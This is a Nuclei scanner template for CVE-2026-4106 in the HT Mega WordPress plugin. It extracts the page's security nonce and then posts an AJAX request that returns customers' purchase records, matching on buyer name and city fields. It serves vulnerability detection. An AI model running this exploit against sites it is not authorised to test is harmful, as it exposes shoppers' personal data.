id: CVE-2026-4106 info: name: HT Mega < 3.0.7 - Sensitive Information Disclosure author: EFETR severity: high description: | The HT Mega plugin for WordPress is vulnerable to Sensitive Information Exposure via AJAX actions. This template dynamically extracts the security nonce before exploitation. reference: - https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/ - https://nvd.nist.gov/vuln/detail/CVE-2026-4106 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-4106 epss-score: 0.00742 epss-percentile: 0.50926 metadata: max-request: 2 verified: true vendor: hastech product: ht-mega-for-elementor framework: wordpress publicwww-query: "/plugins/ht-mega-for-elementor/" tags: cve,cve2026,wordpress,wp-plugin,ht-mega-for-elementor,exposure flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: extracted_nonce part: body group: 1 regex: - 'security["'':\s]+([a-f0-9]{10})' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=wcsales_purchased_products&security={{extracted_nonce}}&limit=10 matchers-condition: and matchers: - type: word part: body words: - '"buyer":' - '"fname":' - '"city":' condition: and - type: status status: - 200 # digest: 490a0046304402205b178c3875df910b9a408be22b6c0bb365fb0fda9d7a26de2b3142ffc8f75c2602201c1b8e20d2b44f1d90d93618dcc57279c991e6164de0129280f5907c3b5df49c:922c64590222798bb761d5b6d8e72950